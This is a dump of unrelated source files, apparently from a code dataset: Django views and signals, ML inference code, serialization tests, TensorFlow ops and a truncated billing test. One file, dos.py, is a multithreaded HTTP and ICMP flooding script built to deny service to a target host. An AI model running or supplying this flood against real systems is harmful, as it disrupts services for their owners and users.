return HttpResponse("GestiRED app UP")
@csrf_exempt
def quality_review_notification(request):
if request.method == 'POST':
data = json.loads(request.body)
qualityControl_id = data["qualityControl_id"]
resource_name = data["resource_name"]
responsible_name = data["responsible_name"]
qualityControl = QualityControl.objects.get(pk=qualityControl_id)
user = qualityControl.responsible
send_mail('Revision Calidad',
'Recurso: ' + resource_name + '\n Observaciones: Se ha asignado para control de calidad a: ' + responsible_name,
'<EMAIL>',
[user.email],
fail_silently=False)
res = {"status": "Ok", "Content:": "Email enviado"}
return HttpResponse(json.dumps(res), content_type="application/json")
@csrf_exempt
def resources_filters(request):
qs_json={}
if request.method == 'GET':
phaseType = request.GET.get('phaseType')
if phaseType != None : phaseType= phaseType.split(',')
resourceType = request.GET.get('resourceType')
if resourceType != None : resourceType = resourceType.split(',')
responsible = request.GET.get('responsible')
if responsible != None: responsible = responsible.split(',')
labels = request.GET.get('labels')
my_dict = {'phase__phaseType__in':phaseType,
'resourceType__in': resourceType,
'responsibles__in':responsible,
'labels__icontains': labels} # Your dict with fields
or_condition = Q()
for key, value in my_dict.items():
if value != None:
or_condition.add(Q(**{key: value}), Q.AND)
lp = set()
lp=Resource.objects.filter(or_condition).all().distinct()
data = list([res.json() for res in lp])
qs_json =json.dumps({'objects':data})
return HttpResponse( qs_json, content_type='application/json')
| 1.898438 | 2 |
ext_modules/_maix_nn/example/yolo2_camera.py | sipeed/python3-maix | 93 | 6851 | <gh_stars>10-100
from maix import nn
from PIL import Image, ImageDraw, ImageFont
from maix import display, camera
import time
from maix.nn import decoder
def draw_rectangle_with_title(draw, box, disp_str, bg_color=(255, 0, 0, 255), font_color=(255, 255, 255, 255)):
# draw = ImageDraw.Draw(img)
font = ImageFont.load_default()
font_w, font_h = font.getsize(disp_str)
draw.rectangle((box[0], box[1], box[0] + box[2], box[1] + box[3]), fill=None, outline=bg_color, width=2)
draw.rectangle((box[0], box[1] - font_h, box[0] + font_w, box[1]), fill=bg_color)
draw.text((box[0], box[1] - font_h), disp_str, fill=font_color, font=font)
camera.config(size=(224, 224))
model = {
"param": "/root/models/yolo2_face_awnn.param",
"bin": "/root/models/yolo2_face_awnn.bin"
}
options = {
"model_type": "awnn",
"inputs": {
"input0": (224, 224, 3)
},
"outputs": {
"output0": (7, 7, (1+4+1)*5)
},
"mean": [127.5, 127.5, 127.5],
"norm": [0.0078125, 0.0078125, 0.0078125],
}
print("-- load model:", model)
m = nn.load(model, opt=options)
print("-- load ok")
print("-- read image")
w = options["inputs"]["input0"][1]
h = options["inputs"]["input0"][0]
# # img.show()
print("-- read image ok")
labels = ["person"]
anchors = [1.19, 1.98, 2.79, 4.59, 4.53, 8.92, 8.06, 5.29, 10.32, 10.65]
yolo2_decoder = decoder.Yolo2(len(labels), anchors, net_in_size=(w, h), net_out_size=(7, 7))
while 1:
img = camera.capture()
if not img:
time.sleep(0.01)
continue
t = time.time()
out = m.forward(img, quantize=True, layout="hwc")
print("-- forward: ", time.time() - t )
t = time.time()
boxes, probs = yolo2_decoder.run(out, nms=0.3, threshold=0.5, img_size=(240, 240))
print("-- decode: ", time.time() - t )
t = time.time()
for i, box in enumerate(boxes):
class_id = probs[i][0]
prob = probs[i][1][class_id]
disp_str = "{}:{:.2f}%".format(labels[class_id], prob*100)
draw_rectangle_with_title(display.get_draw(), box, disp_str)
print("-- draw: ", time.time() - t )
t = time.time()
display.show()
print("-- show: ", time.time() - t )
| 2.15625 | 2 |
tests/test_metadata_options.py | Fatal1ty/mashumaro | 394 | 6852 | from dataclasses import dataclass, field
from datetime import date, datetime, time, timezone
from pathlib import Path
from typing import Any, Dict, Optional, Union
import ciso8601
import pytest
from mashumaro import DataClassDictMixin
from mashumaro.exceptions import UnserializableField
from mashumaro.types import SerializationStrategy
from .entities import (
MutableString,
MyList,
ThirdPartyType,
TypedDictRequiredKeys,
)
def test_ciso8601_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_ciso8601_date_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: date = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=date(2021, 1, 2))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_ciso8601_time_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: time = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=time(3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_pendulum_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=datetime(2008, 12, 29, 7, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2009-W01 0700"})
assert instance == should_be
def test_pendulum_date_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: date = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=date(2008, 12, 29))
instance = DataClass.from_dict({"x": "2009-W01"})
assert instance == should_be
def test_pendulum_time_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: time = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=time(3, 4, 5))
instance = DataClass.from_dict({"x": "2009-W01 030405"})
assert instance == should_be
def test_unsupported_datetime_parser_engine():
with pytest.raises(UnserializableField):
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "unsupported"})
def test_global_function_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"deserialize": ciso8601.parse_datetime_as_naive}
)
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
assert instance == should_be
def test_local_function_datetime_parser():
def parse_dt(s):
return ciso8601.parse_datetime_as_naive(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": parse_dt})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
assert instance == should_be
def test_class_method_datetime_parser():
class DateTimeParser:
@classmethod
def parse_dt(cls, s: str) -> datetime:
return datetime.fromisoformat(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": DateTimeParser.parse_dt})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
assert instance == should_be
def test_class_instance_method_datetime_parser():
class DateTimeParser:
def __call__(self, s: str) -> datetime:
return datetime.fromisoformat(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": DateTimeParser()})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
assert instance == should_be
def test_callable_class_instance_datetime_parser():
class CallableDateTimeParser:
def __call__(self, s):
return ciso8601.parse_datetime(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": CallableDateTimeParser()})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_lambda_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"deserialize": lambda s: ciso8601.parse_datetime(s)}
)
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_derived_dataclass_metadata_deserialize_option():
@dataclass
class A:
x: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})
@dataclass
class B(A, DataClassDictMixin):
y: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})
should_be = B(
x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
y=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
)
instance = B.from_dict(
{"x": "2021-01-02T03:04:05Z", "y": "2021-01-02T03:04:05Z"}
)
assert instance == should_be
def test_bytearray_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: bytearray = field(
metadata={"deserialize": lambda s: s.upper().encode()}
)
should_be = DataClass(x=bytearray(b"ABC"))
instance = DataClass.from_dict({"x": "abc"})
assert instance == should_be
def test_path_like_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Path = field(
metadata={"deserialize": lambda s: Path(str(s).upper())}
)
should_be = DataClass(x=Path("/ABC"))
instance = DataClass.from_dict({"x": "/abc"})
assert instance == should_be
def test_datetime_serialize_option():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"serialize": lambda v: v.strftime("%Y-%m-%d %H:%M:%S")}
)
should_be = {"x": "2021-01-02 03:04:05"}
instance = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
assert instance.to_dict() == should_be
def test_third_party_type_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: ThirdPartyType = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
should_be = DataClass(x=ThirdPartyType(123))
instance = DataClass.from_dict({"x": 123})
assert instance == should_be
assert instance.to_dict() == {"x": 123}
def test_serializable_type_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: MutableString = field(
metadata={
"deserialize": lambda s: MutableString(s.upper()),
"serialize": lambda v: str(v).lower(),
}
)
should_be = DataClass(x=MutableString("ABC"))
instance = DataClass.from_dict({"x": "abc"})
assert instance == should_be
assert instance.to_dict() == {"x": "abc"}
def test_optional_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Optional[ThirdPartyType] = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
instance = DataClass.from_dict({"x": 123})
assert instance
assert instance.x.value == 123
dct = instance.to_dict()
assert dct["x"] == 123
def test_union_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Union[int, str, float, ThirdPartyType] = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
instance = DataClass.from_dict({"x": 1})
assert instance == DataClass(x=ThirdPartyType(value=1))
assert instance.to_dict() == {"x": 1}
def test_serialization_strategy():
class TestSerializationStrategy(SerializationStrategy):
def serialize(self, value):
return [value]
def deserialize(self, value):
return value[0]
@dataclass
class DataClass(DataClassDictMixin):
x: int = field(
metadata={"serialization_strategy": TestSerializationStrategy()}
)
instance = DataClass(x=123)
assert DataClass.from_dict({"x": [123]}) == instance
assert instance.to_dict() == {"x": [123]}
def test_collection_derived_custom_class():
@dataclass
class DataClass(DataClassDictMixin):
x: MyList = field(
metadata={"serialize": lambda v: v, "deserialize": lambda v: v}
)
instance = DataClass(x=[1, 2, 3])
assert DataClass.from_dict({"x": [1, 2, 3]}) == instance
assert instance.to_dict() == {"x": [1, 2, 3]}
def test_dataclass_with_typed_dict_overridden():
def serialize_x(x: TypedDictRequiredKeys) -> Dict[str, Any]:
return {"int": int(x["int"]), "float": float(x["float"])}
def deserialize_x(x: Dict[str, Any]) -> TypedDictRequiredKeys:
return TypedDictRequiredKeys(int=x["int"], float=x["float"])
@dataclass
class DataClass(DataClassDictMixin):
x: TypedDictRequiredKeys = field(
metadata={"serialize": serialize_x, "deserialize": deserialize_x}
)
obj = DataClass(x=TypedDictRequiredKeys(int=1, float=2.0))
data = {"x": {"int": 1, "float": 2.0}}
assert DataClass.from_dict(data) == obj
assert obj.to_dict() == data
| 2.328125 | 2 |
vendor/github.com/tensorflow/tensorflow/tensorflow/python/ops/list_ops.py | owennewo/kfserving | 2 | 6853 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops to manipulate lists of tensors."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_list_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_list_ops import *
# pylint: enable=wildcard-import
ops.NotDifferentiable("TensorListConcatLists")
ops.NotDifferentiable("TensorListElementShape")
ops.NotDifferentiable("TensorListLength")
ops.NotDifferentiable("TensorListPushBackBatch")
def empty_tensor_list(element_shape,
element_dtype,
max_num_elements=None,
name=None):
if max_num_elements is None:
max_num_elements = -1
return gen_list_ops.empty_tensor_list(
element_shape=_build_element_shape(element_shape),
element_dtype=element_dtype,
max_num_elements=max_num_elements,
name=name)
def tensor_list_reserve(element_shape, num_elements, element_dtype, name=None):
return gen_list_ops.tensor_list_reserve(
element_shape=_build_element_shape(element_shape),
num_elements=num_elements,
element_dtype=element_dtype,
name=name)
def tensor_list_from_tensor(tensor, element_shape, name=None):
return gen_list_ops.tensor_list_from_tensor(
tensor=tensor,
element_shape=_build_element_shape(element_shape),
name=name)
def tensor_list_concat(input_handle, element_dtype, name=None):
# Ignore the lengths output of TensorListConcat. It is only used during
# gradient computation.
return gen_list_ops.tensor_list_concat(
input_handle=input_handle, element_dtype=element_dtype, name=name)[0]
def tensor_list_split(tensor, element_shape, lengths, name=None):
return gen_list_ops.tensor_list_split(
tensor=tensor,
element_shape=_build_element_shape(element_shape),
lengths=lengths,
name=name)
@ops.RegisterGradient("TensorListPushBack")
def _PushBackGrad(op, dresult):
return gen_list_ops.tensor_list_pop_back(
dresult, element_dtype=op.get_attr("element_dtype"))
@ops.RegisterGradient("TensorListPopBack")
def _PopBackGrad(op, dlist, delement):
if dlist is None:
dlist = empty_tensor_list(
element_dtype=delement.dtype,
element_shape=gen_list_ops.tensor_list_element_shape(
op.outputs[0], shape_type=dtypes.int32))
return gen_list_ops.tensor_list_push_back(dlist, delement)
@ops.RegisterGradient("TensorListStack")
def _TensorListStackGrad(unused_op, dtensor):
return tensor_list_from_tensor(dtensor, element_shape=dtensor.shape[1:])
@ops.RegisterGradient("TensorListConcat")
def _TensorListConcatGrad(op, dtensor, unused_dlengths):
# TODO(srbs): We lose the element_shape information in tensor_list_concat.
# Consider providing that as an output of TensorListConcat?
if dtensor.shape.rank is None:
element_shape = None
else:
element_shape = [None] + dtensor.shape.as_list()[1:]
return tensor_list_split(
dtensor,
element_shape=_build_element_shape(element_shape),
lengths=op.outputs[1])
@ops.RegisterGradient("TensorListSplit")
def _TensorListSplitGrad(op, dlist):
return tensor_list_concat(dlist, element_dtype=op.inputs[0].dtype), None, None
@ops.RegisterGradient("TensorListFromTensor")
def _TensorListFromTensorGrad(op, dlist):
"""Gradient for TensorListFromTensor."""
if op.inputs[0].shape.dims and op.inputs[0].shape.dims[0].value is not None:
num_elements = op.inputs[0].shape.dims[0].value
else:
num_elements = None
if dlist is None:
dlist = empty_tensor_list(
element_dtype=op.inputs[0].dtype,
element_shape=gen_list_ops.tensor_list_element_shape(
op.outputs[0], shape_type=dtypes.int32))
tensor_grad = gen_list_ops.tensor_list_stack(
dlist, element_dtype=op.inputs[0].dtype, num_elements=num_elements)
shape_grad = None
return tensor_grad, shape_grad
@ops.RegisterGradient("TensorListGetItem")
def _TensorListGetItemGrad(op, ditem):
"""Gradient for TensorListGetItem."""
list_size = gen_list_ops.tensor_list_length(op.inputs[0])
list_grad = gen_list_ops.tensor_list_set_item(
gen_list_ops.tensor_list_reserve(
gen_list_ops.tensor_list_element_shape(op.inputs[0],
shape_type=dtypes.int32),
list_size, element_dtype=ditem.dtype),
index=op.inputs[1],
item=ditem)
index_grad = None
return list_grad, index_grad
@ops.RegisterGradient("TensorListSetItem")
def _TensorListSetItemGrad(op, dlist):
_, index, item = op.inputs
list_grad = gen_list_ops.tensor_list_set_item(
dlist, index=index, item=array_ops.zeros_like(item))
index_grad = None
element_grad = gen_list_ops.tensor_list_get_item(
dlist, index, element_dtype=item.dtype)
return list_grad, index_grad, element_grad
@ops.RegisterGradient("TensorListGather")
def _TensorListGatherGrad(op, dtensor):
_, indices = op.inputs
return gen_list_ops.tensor_list_scatter(
tensor=dtensor, indices=indices,
element_shape=ops.convert_to_tensor(-1, dtype=dtypes.int32)), None
@ops.RegisterGradient("TensorListScatter")
def _TensorListScatterGrad(op, dlist):
t, indices, _ = op.inputs
return gen_list_ops.tensor_list_gather(
dlist, indices, element_dtype=t.dtype), None
def _build_element_shape(shape):
"""Converts shape to a format understood by list_ops for element_shape.
If `shape` is already a `Tensor` it is returned as-is. We do not perform a
type check here.
If shape is None or a TensorShape with unknown rank, -1 is returned.
If shape is a scalar, an int32 tensor with empty list is returned. Note we
do directly return an empty list since ops.convert_to_tensor would conver it
to a float32 which is not a valid type for element_shape.
If shape is a sequence of dims, None's in the list are replaced with -1. We
do not check the dtype of the other dims.
Args:
shape: Could be None, Tensor, TensorShape or a list of dims (each dim could
be a None, scalar or Tensor).
Returns:
A None-free shape that can be converted to a tensor.
"""
if isinstance(shape, ops.Tensor):
return shape
if isinstance(shape, tensor_shape.TensorShape):
# `TensorShape.as_list` requires rank to be known.
shape = shape.as_list() if shape else None
# Shape is unknown.
if shape is None:
return -1
# Shape is a scalar.
if not shape:
return ops.convert_to_tensor(shape, dtype=dtypes.int32)
# Shape is a sequence of dimensions. Convert None dims to -1.
return [d if d is not None else -1 for d in shape]
| 2.34375 | 2 |
tests/test_dump.py | flaeppe/astunparse | 189 | 6854 | import ast
import re
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import astunparse
from tests.common import AstunparseCommonTestCase
class DumpTestCase(AstunparseCommonTestCase, unittest.TestCase):
def assertASTEqual(self, dump1, dump2):
# undo the pretty-printing
dump1 = re.sub(r"(?<=[\(\[])\n\s+", "", dump1)
dump1 = re.sub(r"\n\s+", " ", dump1)
self.assertEqual(dump1, dump2)
def check_roundtrip(self, code1, filename="internal", mode="exec"):
ast_ = compile(str(code1), filename, mode, ast.PyCF_ONLY_AST)
dump1 = astunparse.dump(ast_)
dump2 = ast.dump(ast_)
self.assertASTEqual(dump1, dump2)
| 2.53125 | 3 |
src/django/giraffe/blat/management/commands/reset_app.py | addgene/giraffe | 4 | 6855 | <gh_stars>1-10
from django.core.management.base import AppCommand, CommandError
from django.core.management.sql import sql_reset
from django.core.management.color import no_style
from django.db import connections
class Command(AppCommand):
help = "**********\nThis command resets data for any django app, the difference with the built-in command\n\n '$ python manage.py reset <app_name>'\n\nis that when a sql statement fails, it jumps to the next statement generated by command\n\n '$ python manage.py sqlreset <app_name>'\n\nUseful when the original reset fail when droping CONSTRAINTS\n**********"
output_transaction = True
def handle_app(self, app, **options):
connection = connections['default']
self.style = no_style()
custom_reset_statements = sql_reset(app, self.style, connection)
cursor = connection.cursor()
def execute_sqlreset():
failed_statements = []
for sql in custom_reset_statements:
print 'statement>>>> ' + sql
try:
cursor.execute(sql)
except Exception,e:
if e[0] == 1025:
failed_statements.append(sql)
if failed_statements:
print "These statements failed: "
for s in failed_statements:
print s
execute_sqlreset()
| 2.34375 | 2 |
webBlog/apps.py | JordanBRoberts/python-theBand | 0 | 6856 | <gh_stars>0
from django.apps import AppConfig
class WebblogConfig(AppConfig):
name = 'webBlog'
| 1.195313 | 1 |
requires.py | lydaaa/fzutils | 1 | 6857 | <reponame>lydaaa/fzutils
# coding:utf-8
'''
@author = super_fazai
@File : requires.py
@Time : 2016/8/3 12:59
@connect : <EMAIL>
'''
install_requires = [
'ipython',
'wheel',
'utils',
'db',
'greenlet==0.4.13',
'web.py==0.40.dev1',
'pytz',
'requests',
'selenium==3.8.0', # 3.8.1及其以上版本不支持phantomjs了
'asyncio',
'psutil',
'pyexecjs',
'setuptools',
'colorama',
'twine',
'numpy',
'pprint',
'selenium',
'chardet',
'bs4',
'scrapy',
'demjson',
'pymssql',
'sqlalchemy',
'gevent',
'aiohttp',
'celery',
'jsonpath',
'matplotlib',
'wget',
'flask',
'flask_login',
'mitmproxy', # shell 抓包代理
'pymongo',
'pyexcel',
'pyexcel-xlsx',
'fabric',
'shadowsocks',
# 'pycurl==192.168.127.12',
'furl',
'yarl',
'prettytable',
'xlrd',
'pandas',
'jieba',
'geopandas',
'scikit-image',
'wordcloud', # 词云
'pygame',
] | 1.21875 | 1 |
m15_dos/dos.py | venkatarjun/Python3 | 80 | 6858 | <gh_stars>10-100
import subprocess
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from datetime import datetime
ICMP_ATTACK = "ICMP"
HTTP_ATTACK = "HTTP"
valid_attacks = {HTTP_ATTACK, ICMP_ATTACK}
parser = argparse.ArgumentParser(description="DoS HTTP")
parser.add_argument('-P', '--poolsize', default=10, help='Size of the threadpool')
parser.add_argument('-T', '--target', default='localhost', help='Target URL for http request')
parser.add_argument('-D', '--delay', default=0, help='Amount of time to wait between requests')
parser.add_argument('-A', '--attack', help='Type of attack (e.g. HTTP, ICMP)')
args = parser.parse_args()
threadpool_size = int(args.poolsize)
target = args.target
delay = int(args.delay)
attack = args.attack.upper()
if attack not in valid_attacks:
print(f"Invalid attack type, must be one of: {valid_attacks}")
exit()
terminate = False
def http_request(url):
global terminate
while True and not terminate:
response = requests.get(url)
if not response.ok:
print(f"{str(datetime.now())[:-3]} !!! HTTP request failed, code: {response.status_code}")
else:
print(f"{str(datetime.now())[:-3]} ---> HTTP request successful")
if delay > 0:
for _ in range(0, delay): sleep(1)
print("...http_request thread terminated")
def ping_host(ip):
global terminate
while True and not terminate:
try:
subprocess.check_output(["ping", "-c3", "-n", "-i0.5", "-W2", ip])
print(f"{str(datetime.now())[:-3]} ---> Ping successful: {ip}")
except subprocess.CalledProcessError:
print(f"{str(datetime.now())[:-3]} !!! Ping failed: {ip}")
if delay > 0:
for _ in range(0, delay): sleep(1)
def main():
global terminate
try:
targets = [target for _ in range(0, threadpool_size)]
with ThreadPoolExecutor(max_workers=threadpool_size) as executor:
if attack == HTTP_ATTACK:
executor.map(http_request, targets)
elif attack == ICMP_ATTACK:
executor.map(ping_host, targets)
else:
return # should not have gotten here
except KeyboardInterrupt:
print("... terminating application ...", end="")
terminate = True
print("terminated")
if __name__ == "__main__":
main()
| 2.65625 | 3 |
maestro/backends/django/contrib/signals.py | estudio89/maestro-python | 0 | 6859 | <gh_stars>0
from django.apps import apps
from django.db import models
from django.db.models.signals import post_save, pre_delete
from typing import Type, Optional, List, cast, TYPE_CHECKING
from maestro.backends.django.settings import maestro_settings
from maestro.backends.django.contrib.factory import create_django_data_store
from maestro.backends.django.utils import model_to_entity_name
from maestro.core.metadata import Operation
from .middleware import _add_operation_to_queue
import copy
if TYPE_CHECKING:
from maestro.backends.django import DjangoDataStore
def model_saved_signal(
sender: "Type[models.Model]",
instance: "models.Model",
created: "bool",
raw: "bool",
using: "str",
update_fields: "Optional[List[str]]",
**kwargs,
):
operation: "Operation"
if created:
operation = Operation.INSERT
else:
operation = Operation.UPDATE
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=operation,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=operation, item=copy.deepcopy(instance))
def model_pre_delete_signal(
sender: "Type[models.Model]", instance: "models.Model", using: "str", **kwargs
):
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=Operation.DELETE,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=Operation.DELETE, item=copy.deepcopy(instance))
def _connect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.connect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.connect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
def connect_signals():
for app_model in maestro_settings.MODELS:
model = apps.get_model(app_model)
_connect_signal(model=model)
def _disconnect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.disconnect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.disconnect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
class _DisableSignalsContext:
def __init__(self, model: "Type[models.Model]"):
self.model = model
def __enter__(self):
_disconnect_signal(model=self.model)
def __exit__(self, type, value, traceback):
label = self.model._meta.app_label + "." + self.model._meta.model_name
enabled_models = [label.lower() for label in maestro_settings.MODELS]
if label in enabled_models:
_connect_signal(model=self.model)
def temporarily_disable_signals(model: "Type[models.Model]"):
return _DisableSignalsContext(model=model)
| 1.992188 | 2 |
top/urls.py | pbexe/nextbike-top | 0 | 6860 | from django.urls import include, path
from .views import home, bike
urlpatterns = [
path("", home),
path("bike/<int:number>", bike)
] | 1.789063 | 2 |
Scripts/ReduceFragments.py | mike72353/FragFeatureNet | 1 | 6861 | """
Remove Fragments not in Knowledgebase
"""
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__copyright__ = "Copyright 2019, Hong Kong University of Science and Technology"
__license__ = "3-clause BSD"
from argparse import ArgumentParser
import numpy as np
import pickle
parser = ArgumentParser(description="Build Files")
parser.add_argument("--datadir", type=str, default="Data", help="input - XXX.YYY ")
parser.add_argument("--envNewAcronym", type=str, default="PRT.SNW", help="input - XXX.YYY ")
args = parser.parse_args()
# Check the Bound Fragments
BoundFrags = np.loadtxt("../%s/%s/%s.Homogenised.boundfrags_zeros.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), delimiter=',')
normalDF = pickle.load(open("../%s/GrandCID.dict" %(args.datadir), "rb"))
binding = np.full(BoundFrags.shape,-1)
mlength = 0
for r, i in enumerate(BoundFrags):
for c, j in enumerate(i[i!=0]):
try:
# Checks whether the Fragment can be found in the 59k Fragment Base
binding[r,c]=normalDF.index.get_loc(int(j))
except:
continue
temp = binding[r]
if temp[temp!=-1].shape[0] > mlength:
mlength = temp[temp!=-1].shape[0]
print(mlength) #Finds the maximum number of Fragments per environment -> 705
indices = np.empty(binding.shape[0])
red_binding = np.full((binding.shape[0], mlength), -1)
for j, i in enumerate(binding):
indices[j] = i[i!=-1].shape[0]
red_binding[j][:int(indices[j])] = i[i!=-1]
red_binding = np.delete(red_binding, np.where(indices==0), axis=0)
pickle.dump(red_binding, open("../%s/%s/%s.binding.mtr" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environments without binding Fragments
Features_all = pickle.load(open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "rb"))
Features_all = np.delete(Features_all, np.where(indices==0), axis=0)
pickle.dump(Features_all, open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environment annotiation without binding fragments
with open("../%s/%s/%s.Homogenised.annotation.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "r+") as f:
lines = f.readlines()
for i in np.where(indices==0)[0][::-1]:
del lines[i]
f.seek(0)
f.truncate()
f.writelines(lines)
| 2.453125 | 2 |
client/core/tests/billing_tests.py | vbohinc/CommunityCellularManager | 0 | 6862 | """Tests for core.billing.
Run this test from the project root
$ nosetests core.tests.billing_tests
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import random
import math
from core.billing import get_call_cost
from core.billing import get_prefix_from_number
from core.billing import get_sms_cost
from core.billing import process_prices
from core.billing import round_to_billable_unit
from core.billing import round_up_to_nearest_100
from core import config_database
TARIFF = 100
class GetCostTest(unittest.TestCase):
"""Testing core.billing.get_call_cost."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'hokay'
cls.config_db['free_seconds'] = '5'
cls.config_db['billable_unit'] = '1'
# Setup some price data like what would be sent back from the cloud.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '509',
'country_name': 'Haiti',
'country_code': 'HT',
'cost_to_subscriber_per_sms': 900,
'cost_to_subscriber_per_min': 1100,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '56',
'country_name': 'Chile',
'country_code': 'CL',
'cost_to_subscriber_per_sms': 1000,
'cost_to_subscriber_per_min': 800,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '63',
'country_name': 'Philippines',
'country_code': 'PH',
'cost_to_subscriber_per_sms': 100,
'cost_to_subscriber_per_min': 600,
'billable_unit': 30,
}, {
'directionality': 'off_network_receive',
'cost_to_subscriber_per_sms': 200,
'cost_to_subscriber_per_min': 100,
'billable_unit': 1,
}, {
'directionality': 'on_network_send',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 300,
'billable_unit': 1,
}, {
'directionality': 'on_network_receive',
'cost_to_subscriber_per_sms': 500,
